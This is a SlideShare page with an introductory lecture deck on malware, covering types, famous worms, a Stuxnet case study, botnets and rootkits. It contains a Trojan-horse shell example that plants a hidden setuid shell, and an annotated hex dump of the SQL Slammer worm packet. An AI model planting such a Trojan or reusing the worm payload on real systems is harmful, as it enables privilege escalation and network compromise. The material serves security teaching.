SlideShare a Scribd company logo

Malwares Malwares Malwares Malwares Malwares

Download as PPT, PDF
N
NioLemuelLazatinConc

Ict01

Education
1 of 39
1 COMPUTER FUNDAMENTALS TECHNOLOGY Malwares Topic 9: Malware
Malware Features & Types • Infectious: – Viruses, worms • Concealment: – Trojan horses, logic bombs, rootkits • Malware for stealing information: – Spyware, keyloggers, screen scrapers • Malware for profit: – Dialers, scarewares, ransomware • Malware as platform for other attacks – Botnets, backdoors (trapdoors) • Many malwares have characteristics of multiple types Topic 9: Malware 2
Topic 9: Malware 3 Trojan Horse Example: Attacker: Place the following file cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm ./ls ls $* as /homes/victim/ls • Victim ls • Software that appears to perform a desirable function for the user prior to run or install, but (perhaps in addition to the expected function) steals information or harms the system. • User tricked into executing Trojan horse – Expects (and sees) overt and expected behavior – Covertly perform malicious acts with user’s authorization
Topic 9: Malware 4 Trapdoor or Backdoor • Secret entry point into a system – Specific user identifier or password that circumvents normal security procedures. • Commonly used by developers – Could be included in a compiler.
Topic 9: Malware 5 Logic Bomb • Embedded in legitimate programs • Activated when specified conditions met – E.g., presence/absence of some file; Particular date/time or particular user • When triggered, typically damages system – Modify/delete files/disks
Example of Logic Bomb • In 1982, the Trans-Siberian Pipeline incident occurred. A KGB operative was to steal the plans for a sophisticated control system and its software from a Canadian firm, for use on their Siberian pipeline. The CIA was tipped off by documents in the Farewell Dossier and had the company insert a logic bomb in the program for sabotage purposes. This eventually resulted in “the most monumental non-nuclear explosion and fire ever seen from space”. Topic 9: Malware 6
Spyware • Malware that collects little bits of information at a time about users without their knowledge – Keyloggers: stealthly tracking and logging key strokes – Screen scrapers: stealthly reading data from a computer display – May also tracking browsing habit – May also re-direct browsing and display ads Topic 9: Malware 7
Scareware • Malware that scares victims into take actions that ultimately end up compromising our own security. – E.g., paying for and installing fake anti-virus products Topic 9: Malware 8
Topic 9: Malware 9
Ransomware • Holds a computer system, or the data it contains, hostage against its user by demanding a ransom. – Disable an essential system service or lock the display at system startup – Encrypt some of the user's personal files, originally referred to as cryptoviruses, cryptotrojans or cryptoworms • Victim user has to – enter a code obtainable only after wiring payment to the attacker or sending an SMS message – buy a decryption or removal tool Topic 9: Malware 10
Topic 9: Malware 11 Virus • Attach itself to a host (often a program) and replicate itself • Self-replicating code – Self-replicating Trojan horses – Alters normal code with “infected” version • Operates when infected code executed If spread condition then For target files if not infected then alter to include virus Perform malicious action Execute normal program
Topic 9: Malware 12 Worm • Self-replicating malware that does not require a host program • Propagates a fully working version of itself to other machines • Carries a payload performing hidden tasks – Backdoors, spam relays, DDoS agents; … • Phases – Probing  Exploitation  Replication  Payload
General Worm Trends • Speed of spreading – Slow to fast to stealthy • Vector of infection – Single to varied – Exploiting software vulnerabilities to exploiting human vulnerabilities • Payloads – From “no malicious payloads beyond spreading” to botnets, spywares, and physical systems Topic 9: Malware 13
Topic 9: Malware 14 Morris Worm (November 1988) • First major worm • Written by Robert Morris – Son of former chief scientist of NSA’s National Computer Security Center What comes next: 1 11 21 1211 111221?
Topic 9: Malware 15 Morris Worm Description • Two parts – Main program to spread worm • look for other machines that could be infected • try to find ways of infiltrating these machines – Vector program (99 lines of C) • compiled and run on the infected machines • transferred main program to continue attack
Topic 9: Malware 16 Other Features of The Worm • Self-hiding – Program is shown as 'sh' when ps – Files didn’t show up in ls • Find targets using several mechanisms: • 'netstat -r -n‘, /etc/hosts, … • Compromise multiple hosts in parallel – When worm successfully connects, forks a child to continue the infection while the parent keeps trying new hosts • Worm has no malicious payload • Where does the damage come from?
Damage • One host may be repeatedly compromised • Supposedly designed to gauge the size of the Internet • The following bug made it more damaging. – Asks a host whether it is compromised; however, even if it answers yes, still compromise it with probability 1/8. Topic 9: Malware 17
Topic 9: Malware 18 Increasing propagation speed • Code Red, July 2001 – Affects Microsoft Index Server 2.0, – Exploits known buffer overflow in Idq.dll – Vulnerable population (360,000 servers) infected in 14 hours • SQL Slammer, January 2003 – Affects in Microsoft SQL 2000 – Exploits known months ahead of worm outbreak • Buffer overflow vulnerability reported in June 2002 • Patched released in July 2002 (Bulletin MS02-39) – Vulnerable population infected in less than 10 minutes
Topic 9: Malware 19 Slammer Worms (Jan., 2003) SQL Server 2000 SQLSERVR.EXE • MS SQL Server 2000 receives a request of the worm – SQLSERVR.EXE process listens on UDP Port 1434
Topic 9: Malware 20 0000: 4500 0194 b6db 0000 6d11 2e2d 89e5 0a9c E...¶Û..m..-.å.. 0010: cb08 07c7 1052 059a 0180 bda8 0401 0101 Ë..Ç.R....½¨.... 0020: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 0030: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 0040: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 0050: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 0060: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 0070: 0101 0101 0101 0101 0101 0101 01dc c9b0 .............ÜÉ° 0080: 42eb 0e01 0101 0101 0101 70ae 4201 70ae Bë........p®B.p® 0090: 4290 9090 9090 9090 9068 dcc9 b042 b801 B........hÜÉ°B¸. 00a0: 0101 0131 c9b1 1850 e2fd 3501 0101 0550 ...1ɱ.Pâý5....P 00b0: 89e5 5168 2e64 6c6c 6865 6c33 3268 6b65 .åQh.dllhel32hke 00c0: 726e 5168 6f75 6e74 6869 636b 4368 4765 rnQhounthickChGe 00d0: 7454 66b9 6c6c 5168 3332 2e64 6877 7332 tTf¹llQh32.dhws2 00e0: 5f66 b965 7451 6873 6f63 6b66 b974 6f51 _f¹etQhsockf¹toQ 00f0: 6873 656e 64be 1810 ae42 8d45 d450 ff16 hsend¾..®B.EÔP.. 0100: 508d 45e0 508d 45f0 50ff 1650 be10 10ae P.EàP.EðP..P¾..® 0110: 428b 1e8b 033d 558b ec51 7405 be1c 10ae B....=U.ìQt.¾..® 0120: 42ff 16ff d031 c951 5150 81f1 0301 049b B...Ð1ÉQQP.ñ.... 0130: 81f1 0101 0101 518d 45cc 508b 45c0 50ff .ñ....Q.EÌP.EÀP. 0140: 166a 116a 026a 02ff d050 8d45 c450 8b45 .j.j.j..ÐP.EÄP.E 0150: c050 ff16 89c6 09db 81f3 3c61 d9ff 8b45 ÀP...Æ.Û..óa...E 0160: b48d 0c40 8d14 88c1 e204 01c2 c1e2 0829 ´..@...Áâ..ÂÁâ.) 0170: c28d 0490 01d8 8945 b46a 108d 45b0 5031 Â....Ø.E´j..E°P1 0180: c951 6681 f178 0151 8d45 0350 8b45 ac50 ÉQf.ñx.Q.E.P.E¬P 0190: ffd6 ebca .ÖëÊ The 0x01 characters overflow the buffer and spill into the stack right up to the return address This value overwrites the return address and points it to a location in sqlsort.dll which effectively calls a jump to %esp UDP packet header This byte signals the SQL Server to store the contents of the packet in the buffer Restore payload, set up socket structure, and get the seed for the random number generator Main loop of Slammer: generate new random IP address, push arguments onto stack, call send method, loop around NOP slide This is the first instruction to get executed. It jumps control to here. Slammer’s code is 376 bytes!
Topic 9: Malware 21 Research Worms • Warhol Worms – Could infect all vulnerable hosts in 15 minutes – 1 hour – Uses optimized scanning in three phases • Phase 1: initial hit list of potentially vulnerable hosts • Phase 2: local subnet scanning • Phase 3: permutation scanning for complete, self-coordinated coverage, all instances pick a random host as starting target and follow up with hosts in a particular order (the same order for all instances); if a target host is already compromised, pick another random host • Flash Worms – Could infect all vulnerable hosts in 30 seconds – Determines a complete hit list of servers with relevant service open and include it with the worm
Topic 9: Malware 22 Email Worms: Spreading as Email Attachments • Love Bug worm (ILOVEYOU worm) (2000): – May 3, 2000: 5.5 to 10 billion dollars in damage • MyDoom worm (2004) – First identified in 26 January 2004: – On 1 February 2004, about 1 million computers infected with Mydoom begin a massive DDoS attack against the SCO group • Similar method use text messages on mobile phones
Stuxnet: History (1) • 2009 June: Earliest Stuxnet seen – Does not use MS10-046 • Microsoft Security Bulletin MS10-046: Vulnerability in Windows Shell Could Allow Remote Code Execution – Does not have signed drivers • 2010 Jan: Stuxnet driver signed – With a valid certificate belonging to Realtek Semiconductors • 2010 June: Virusblokada reports W32.Stuxnet – Stuxnet use MS10-046 – Verisign revokes Realtek certificate • 2010 July: Eset identify new Stuxnet driver – With a valid certificate belonging to JMicron Technology Corp • 2010 July: Siemens report they are investigating malware SCADA systems – Verisign revokes JMicron certificate Topic 9: Malware 23
History (2) • 2010 Aug: Microsoft issues MS10-046 – Patches windows shell shortcut vulnerability • 2010 Sept: Microsoft issues MS10-061 – Patches Printer Spooler Vulnerability • 2010 Sept: Iran nuclear plant hit by delay – Warm weather blamed – Measured temperatures were at historical averages • 2010 Oct: Iran arrest “spies” – Spies who attempted to sabotage the country's nuclear programme – Russian nuclear nuclear experts flee Iran Topic 9: Malware 24
Scenario (3) • The malicious binaries need to be signed to avoid suspicion – Two digital certificates were compromised – High probability that the digital certificates/keys were physically stolen from the companies premises – Realtek and JMicron are in close proximity Topic 9: Malware 25
Scenario (4) • Initial Infection – Stuxnet needed to be introduced to the targeted environment • Insider • Willing third party • Unwilling third party such as a contractor – Delivery method • USB drive • Windows Maintenance Laptop Topic 9: Malware 26
Scenario (5) • Infection Spread – Look for Windows computer that program the PLC’s (Called Field PG) • The Field PG are typically not network • Spread the Infection on computers on the local LAN – Zero-day vulnerabilities – Two-year old vulnerability – Spread to all available USB drives – When a USB drive is connected to the Field PG, the Infection jumps to the Field PG • The “airgap” is thus breached Topic 9: Malware 27
Scenario (6) • Target Infection – Look for Specific PLC • Running Step 7 Operating System – Change PLC code • Sabotage system • Hide modifications – Command and Control may not be possible • Due to the “airgap” • Functionality already embedded Topic 9: Malware 28
Command & Control • Stuxnet contacts the command and control server – Test if can connect to: • www.windowsupdate.com • www.msn.com – On port 80 – Sends some basic information about the compromised computer to the attacker – www.mypremierfutbol.com – www.todaysfutbol.com – The two URLs above previously pointed to servers in Malaysia and Denmark Topic 9: Malware 29
Command & Control (2) Topic 9: Malware 30
Windows Rootkit Functionality • Stuxnet has the ability to hide copies of its files copied to removable drives • Stuxnet extracts Resource 201 as MrxNet.sys. – The driver is registered as a service creating the following registry entry: – HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesMRxNet”I magePath” = “%System%driversmrxnet.sys” – The driver file is a digitally signed with a legitimate Realtek digital certificate. – The driver then filters(hides) files that : • Files with a “.LNK” extension having a size of 4,171 bytes.• • Files named “~WTR[FOUR NUMBERS].TMP”, – whose size is between 4Kb and 8Mb; the sum of the four numbers, modulo 10 is null. For example, 4+1+3+2=10=0 mod 10 • Examples: – Copy of Copy of Copy of Copy of Shortcut to.lnk – Copy of Shortcut to.lnk – ~wtr4141.tmp Topic 9: Malware 31
Propagation Methods: Network • Peer-to-peer communication and updates • Infecting WinCC machines via a hardcoded database server password • Propagating through network shares • Propagating through the MS10-061 Print Spooler Zero-Day Vulnerability • Propagating through the MS08-067 Windows Server Service Vulnerability Topic 9: Malware 32
Propagation Methods: USB • LNK Vulnerability (CVE-2010-2568) • AutoRun.Inf Topic 9: Malware 33
What was the target? • Bushehr Nuclear Plant in Iran – 60% Infections in Iran – No other commercial gain – Stuxnet complexity – Stuxnet self destruct date – Siemens specific PLC’s Topic 9: Malware 34
Conclusion • Stuxnet represents the first of many milestones in malicious code history – It is the first to exploit multiple 0-day vulnerabilities, – Compromise two digital certificates, – And inject code into industrial control systems – and hide the code from the operator. • Stuxnet is of such great complexity – Requiring significant resources to develop – That few attackers will be capable of producing a similar threat • Stuxnet has highlighted direct-attack attempts on critical infrastructure are possible and not just theory or movie plotlines. Topic 9: Malware 35
Topic 9: Malware 40 Zombie & Botnet • Secretly takes over another networked computer by exploiting software flows • Builds the compromised computers into a zombie network or botnet – a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. • Uses it to indirectly launch attacks – E.g., DDoS, phishing, spamming, cracking
Topic 9: Malware 41 Rootkit • A rootkit is software that enables continued privileged access to a computer while actively hiding its presence from administrators by subverting standard operating system functionality or other applications. • Emphasis is on hiding information from administrators’ view, so that malware is not detected – E.g., hiding processes, files, opened network connections, etc • Example: Sony BMG copy protection rootkit scandal – In 2005, Sony BMG included Extended Copy Protection on music CDs, which are automatically installed on Windows on CDs are played.
Types of Rootkits • User-level rootkits – Replace utilities such as ps, ls, ifconfig, etc – Replace key libraries – Detectable by utilities like tripwire • Kernel-level rootkits – Replace or hook key kernel functions – Through, e.g., loadable kernel modules or direct kernel memory access – A common detection strategy: compare the view obtained by enumerating kernel data structures with that obtained by the API interface – Can be defended by kernel-driver signing (required by 64-bit windows) Topic 9: Malware 42
Topic 9: Malware 44 How does a computer get infected with malware or being intruded? • Executes malicious code via user actions (email attachment, download and execute trojan horses, or inserting USB drives) • Buggy programs accept malicious input – daemon programs that receive network traffic – client programs (e.g., web browser, mail client) that receive input data from network – Programs Read malicious files with buggy file reader program • Configuration errors (e.g., weak passwords, guest accounts, DEBUG options, etc) • Physical access to computer

Recommended

formation malware CSC50 pour les attaque malware .ppt
formation malware CSC50 pour les attaque malware .pptformation malware CSC50 pour les attaque malware .ppt
formation malware CSC50 pour les attaque malware .pptMhammedTizguine1
 
virusessssßsssssssssssssssssssssssssssssssss.ppt
virusessssßsssssssssssssssssssssssssssssssss.pptvirusessssßsssssssssssssssssssssssssssssssss.ppt
virusessssßsssssssssssssssssssssssssssssssss.pptNioLemuelLazatinConc
 
14_526_topic10.ppt
14_526_topic10.ppt14_526_topic10.ppt
14_526_topic10.pptVijayPatidar71
 
14_526_topic10.ppt
14_526_topic10.ppt14_526_topic10.ppt
14_526_topic10.pptNitashaKumari2
 
14_526_topic10.ppt
14_526_topic10.ppt14_526_topic10.ppt
14_526_topic10.pptImXaib
 
Information about malwares and Attacks.pptx
Information about malwares and Attacks.pptxInformation about malwares and Attacks.pptx
Information about malwares and Attacks.pptxmalikmuzammil2326
 
Security & Privacy - Lecture B
Security & Privacy - Lecture BSecurity & Privacy - Lecture B
Security & Privacy - Lecture BCMDLearning
 
Botnetsand applications
Botnetsand applicationsBotnetsand applications
Botnetsand applicationsUltraUploader
 

Recommended

formation malware CSC50 pour les attaque malware .ppt
formation malware CSC50 pour les attaque malware .pptformation malware CSC50 pour les attaque malware .ppt
formation malware CSC50 pour les attaque malware .pptMhammedTizguine1
 
virusessssßsssssssssssssssssssssssssssssssss.ppt
virusessssßsssssssssssssssssssssssssssssssss.pptvirusessssßsssssssssssssssssssssssssssssssss.ppt
virusessssßsssssssssssssssssssssssssssssssss.pptNioLemuelLazatinConc
 
14_526_topic10.ppt
14_526_topic10.ppt14_526_topic10.ppt
14_526_topic10.pptVijayPatidar71
 
14_526_topic10.ppt
14_526_topic10.ppt14_526_topic10.ppt
14_526_topic10.pptNitashaKumari2
 
14_526_topic10.ppt
14_526_topic10.ppt14_526_topic10.ppt
14_526_topic10.pptImXaib
 
Information about malwares and Attacks.pptx
Information about malwares and Attacks.pptxInformation about malwares and Attacks.pptx
Information about malwares and Attacks.pptxmalikmuzammil2326
 
Security & Privacy - Lecture B
Security & Privacy - Lecture BSecurity & Privacy - Lecture B
Security & Privacy - Lecture BCMDLearning
 
Botnetsand applications
Botnetsand applicationsBotnetsand applications
Botnetsand applicationsUltraUploader
 
unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfRohitGautam261127
 
Computer Viruses
Computer VirusesComputer Viruses
Computer Virusesmkgspsu
 
How to stay protected against ransomware
How to stay protected against ransomwareHow to stay protected against ransomware
How to stay protected against ransomwareSophos Benelux
 
Ransomware: WanaCry, WanCrypt
Ransomware: WanaCry, WanCryptRansomware: WanaCry, WanCrypt
Ransomware: WanaCry, WanCryptYash Diwakar
 
I Heart Stuxnet
I Heart StuxnetI Heart Stuxnet
I Heart StuxnetGil Megidish
 
Ransomware- What you need to know to Safeguard your Data
Ransomware- What you need to know to Safeguard your DataRansomware- What you need to know to Safeguard your Data
Ransomware- What you need to know to Safeguard your DataInderjeet Singh
 
Malware
MalwareMalware
MalwareNikola Milosevic
 
Detecting Intrusions and Malware - Eric Vanderburg - JurInnov
Detecting Intrusions and Malware - Eric Vanderburg - JurInnovDetecting Intrusions and Malware - Eric Vanderburg - JurInnov
Detecting Intrusions and Malware - Eric Vanderburg - JurInnovEric Vanderburg
 
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...Lastline, Inc.
 
Countering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by MalwareCountering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by MalwareTyler Borosavage
 
Dealing with legacy code
Dealing with legacy codeDealing with legacy code
Dealing with legacy codeG Prachi
 
Botnets Attacks.pptx
Botnets Attacks.pptxBotnets Attacks.pptx
Botnets Attacks.pptxMuhammadRehan856177
 
Fundamentals of Computing Chapter 9
Fundamentals of Computing Chapter 9Fundamentals of Computing Chapter 9
Fundamentals of Computing Chapter 9Mohd Harris Ahmad Jaal
 
computer viruses
computer virusescomputer viruses
computer virusesupenthira I
 
Introduction to Malware - Part 1
Introduction to Malware - Part 1 Introduction to Malware - Part 1
Introduction to Malware - Part 1 Lastline, Inc.
 
Hacking 1224807880385377-9
Hacking 1224807880385377-9Hacking 1224807880385377-9
Hacking 1224807880385377-9Geoff Pesimo
 
Get Smart about Ransomware: Protect Yourself and Organization
Get Smart about Ransomware: Protect Yourself and OrganizationGet Smart about Ransomware: Protect Yourself and Organization
Get Smart about Ransomware: Protect Yourself and OrganizationSecurity Innovation
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?HackIT Ukraine
 
هک پایگاه داده و راهکارهای مقابلهDatabases hacking, safeguards and counterme...
هک پایگاه داده و راهکارهای مقابلهDatabases hacking, safeguards and counterme... هک پایگاه داده و راهکارهای مقابلهDatabases hacking, safeguards and counterme...
هک پایگاه داده و راهکارهای مقابلهDatabases hacking, safeguards and counterme...M Mehdi Ahmadian
 
Nomura UCCSC 2009
Nomura UCCSC 2009Nomura UCCSC 2009
Nomura UCCSC 2009dnomura
 
WWW & INTERNET.pptxxxccccccccccccccvvvvvc
WWW & INTERNET.pptxxxccccccccccccccvvvvvcWWW & INTERNET.pptxxxccccccccccccccvvvvvc
WWW & INTERNET.pptxxxccccccccccccccvvvvvcNioLemuelLazatinConc
 
keyboard-201203151617.pptxxxxxxxxxxxxxxx
keyboard-201203151617.pptxxxxxxxxxxxxxxxkeyboard-201203151617.pptxxxxxxxxxxxxxxx
keyboard-201203151617.pptxxxxxxxxxxxxxxxNioLemuelLazatinConc
 

More Related Content

Similar to Malwares Malwares Malwares Malwares Malwares

unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfRohitGautam261127
 
Computer Viruses
Computer VirusesComputer Viruses
Computer Virusesmkgspsu
 
How to stay protected against ransomware
How to stay protected against ransomwareHow to stay protected against ransomware
How to stay protected against ransomwareSophos Benelux
 
Ransomware: WanaCry, WanCrypt
Ransomware: WanaCry, WanCryptRansomware: WanaCry, WanCrypt
Ransomware: WanaCry, WanCryptYash Diwakar
 
Ransomware- What you need to know to Safeguard your Data
Ransomware- What you need to know to Safeguard your DataRansomware- What you need to know to Safeguard your Data
Ransomware- What you need to know to Safeguard your DataInderjeet Singh
 
Detecting Intrusions and Malware - Eric Vanderburg - JurInnov
Detecting Intrusions and Malware - Eric Vanderburg - JurInnovDetecting Intrusions and Malware - Eric Vanderburg - JurInnov
Detecting Intrusions and Malware - Eric Vanderburg - JurInnovEric Vanderburg
 
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...Lastline, Inc.
 
Countering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by MalwareCountering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by MalwareTyler Borosavage
 
Dealing with legacy code
Dealing with legacy codeDealing with legacy code
Dealing with legacy codeG Prachi
 
computer viruses
computer virusescomputer viruses
computer virusesupenthira I
 
Introduction to Malware - Part 1
Introduction to Malware - Part 1 Introduction to Malware - Part 1
Introduction to Malware - Part 1 Lastline, Inc.
 
Hacking 1224807880385377-9
Hacking 1224807880385377-9Hacking 1224807880385377-9
Hacking 1224807880385377-9Geoff Pesimo
 
Get Smart about Ransomware: Protect Yourself and Organization
Get Smart about Ransomware: Protect Yourself and OrganizationGet Smart about Ransomware: Protect Yourself and Organization
Get Smart about Ransomware: Protect Yourself and OrganizationSecurity Innovation
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?HackIT Ukraine
 
هک پایگاه داده و راهکارهای مقابلهDatabases hacking, safeguards and counterme...
هک پایگاه داده و راهکارهای مقابلهDatabases hacking, safeguards and counterme... هک پایگاه داده و راهکارهای مقابلهDatabases hacking, safeguards and counterme...
هک پایگاه داده و راهکارهای مقابلهDatabases hacking, safeguards and counterme...M Mehdi Ahmadian
 
Nomura UCCSC 2009
Nomura UCCSC 2009Nomura UCCSC 2009
Nomura UCCSC 2009dnomura
 

Similar to Malwares Malwares Malwares Malwares Malwares (20)

unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdf
 
Computer Viruses
Computer VirusesComputer Viruses
Computer Viruses
 
How to stay protected against ransomware
How to stay protected against ransomwareHow to stay protected against ransomware
How to stay protected against ransomware
 
Ransomware: WanaCry, WanCrypt
Ransomware: WanaCry, WanCryptRansomware: WanaCry, WanCrypt
Ransomware: WanaCry, WanCrypt
 
I Heart Stuxnet
I Heart StuxnetI Heart Stuxnet
I Heart Stuxnet
 
Ransomware- What you need to know to Safeguard your Data
Ransomware- What you need to know to Safeguard your DataRansomware- What you need to know to Safeguard your Data
Ransomware- What you need to know to Safeguard your Data
 
Malware
MalwareMalware
Malware
 
Detecting Intrusions and Malware - Eric Vanderburg - JurInnov
Detecting Intrusions and Malware - Eric Vanderburg - JurInnovDetecting Intrusions and Malware - Eric Vanderburg - JurInnov
Detecting Intrusions and Malware - Eric Vanderburg - JurInnov
 
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
 
Countering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by MalwareCountering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by Malware
 
Dealing with legacy code
Dealing with legacy codeDealing with legacy code
Dealing with legacy code
 
Botnets Attacks.pptx
Botnets Attacks.pptxBotnets Attacks.pptx
Botnets Attacks.pptx
 
Fundamentals of Computing Chapter 9
Fundamentals of Computing Chapter 9Fundamentals of Computing Chapter 9
Fundamentals of Computing Chapter 9
 
computer viruses
computer virusescomputer viruses
computer viruses
 
Introduction to Malware - Part 1
Introduction to Malware - Part 1 Introduction to Malware - Part 1
Introduction to Malware - Part 1
 
Hacking 1224807880385377-9
Hacking 1224807880385377-9Hacking 1224807880385377-9
Hacking 1224807880385377-9
 
Get Smart about Ransomware: Protect Yourself and Organization
Get Smart about Ransomware: Protect Yourself and OrganizationGet Smart about Ransomware: Protect Yourself and Organization
Get Smart about Ransomware: Protect Yourself and Organization
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?
 
هک پایگاه داده و راهکارهای مقابلهDatabases hacking, safeguards and counterme...
هک پایگاه داده و راهکارهای مقابلهDatabases hacking, safeguards and counterme... هک پایگاه داده و راهکارهای مقابلهDatabases hacking, safeguards and counterme...
هک پایگاه داده و راهکارهای مقابلهDatabases hacking, safeguards and counterme...
 
Nomura UCCSC 2009
Nomura UCCSC 2009Nomura UCCSC 2009
Nomura UCCSC 2009
 

More from NioLemuelLazatinConc

WWW & INTERNET.pptxxxccccccccccccccvvvvvc
WWW & INTERNET.pptxxxccccccccccccccvvvvvcWWW & INTERNET.pptxxxccccccccccccccvvvvvc
WWW & INTERNET.pptxxxccccccccccccccvvvvvcNioLemuelLazatinConc
 
keyboard-201203151617.pptxxxxxxxxxxxxxxx
keyboard-201203151617.pptxxxxxxxxxxxxxxxkeyboard-201203151617.pptxxxxxxxxxxxxxxx
keyboard-201203151617.pptxxxxxxxxxxxxxxxNioLemuelLazatinConc
 
filipino cultural values.pptxxxxxxxxxxxx
filipino cultural values.pptxxxxxxxxxxxxfilipino cultural values.pptxxxxxxxxxxxx
filipino cultural values.pptxxxxxxxxxxxxNioLemuelLazatinConc
 
core-4.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
core-4.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxcore-4.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
core-4.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxNioLemuelLazatinConc
 
CBS PRESENTATION.pptxxxxxxxxxxxxxxxxxxxxx
CBS PRESENTATION.pptxxxxxxxxxxxxxxxxxxxxxCBS PRESENTATION.pptxxxxxxxxxxxxxxxxxxxxx
CBS PRESENTATION.pptxxxxxxxxxxxxxxxxxxxxxNioLemuelLazatinConc
 
INTEREST.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxx
INTEREST.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxINTEREST.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxx
INTEREST.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxNioLemuelLazatinConc
 
core-1.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
core-1.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxcore-1.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
core-1.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxNioLemuelLazatinConc
 
FINAL-POLTICAL-DYNAST-WPS-Office-11.pptx
FINAL-POLTICAL-DYNAST-WPS-Office-11.pptxFINAL-POLTICAL-DYNAST-WPS-Office-11.pptx
FINAL-POLTICAL-DYNAST-WPS-Office-11.pptxNioLemuelLazatinConc
 
PRICING-STRATEGY.pptxxxxxxxxxxxxxxxxxxxx
PRICING-STRATEGY.pptxxxxxxxxxxxxxxxxxxxxPRICING-STRATEGY.pptxxxxxxxxxxxxxxxxxxxx
PRICING-STRATEGY.pptxxxxxxxxxxxxxxxxxxxxNioLemuelLazatinConc
 
Storage-computer-fundamentals.pptttttttt
Storage-computer-fundamentals.ppttttttttStorage-computer-fundamentals.pptttttttt
Storage-computer-fundamentals.ppttttttttNioLemuelLazatinConc
 
lesson 1 philsys.pptxxxxxxccccccccccccccxc
lesson 1 philsys.pptxxxxxxccccccccccccccxclesson 1 philsys.pptxxxxxxccccccccccccccxc
lesson 1 philsys.pptxxxxxxccccccccccccccxcNioLemuelLazatinConc
 
COMPUTER MAINTENANCE TECHNOLOGY ppt.pptx
COMPUTER MAINTENANCE TECHNOLOGY ppt.pptxCOMPUTER MAINTENANCE TECHNOLOGY ppt.pptx
COMPUTER MAINTENANCE TECHNOLOGY ppt.pptxNioLemuelLazatinConc
 

More from NioLemuelLazatinConc (19)

WWW & INTERNET.pptxxxccccccccccccccvvvvvc
WWW & INTERNET.pptxxxccccccccccccccvvvvvcWWW & INTERNET.pptxxxccccccccccccccvvvvvc
WWW & INTERNET.pptxxxccccccccccccccvvvvvc
 
keyboard-201203151617.pptxxxxxxxxxxxxxxx
keyboard-201203151617.pptxxxxxxxxxxxxxxxkeyboard-201203151617.pptxxxxxxxxxxxxxxx
keyboard-201203151617.pptxxxxxxxxxxxxxxx
 
filipino cultural values.pptxxxxxxxxxxxx
filipino cultural values.pptxxxxxxxxxxxxfilipino cultural values.pptxxxxxxxxxxxx
filipino cultural values.pptxxxxxxxxxxxx
 
core-4.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
core-4.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxcore-4.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
core-4.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
CBS PRESENTATION.pptxxxxxxxxxxxxxxxxxxxxx
CBS PRESENTATION.pptxxxxxxxxxxxxxxxxxxxxxCBS PRESENTATION.pptxxxxxxxxxxxxxxxxxxxxx
CBS PRESENTATION.pptxxxxxxxxxxxxxxxxxxxxx
 
INTEREST.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxx
INTEREST.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxINTEREST.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxx
INTEREST.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
core-1.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
core-1.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxcore-1.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
core-1.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
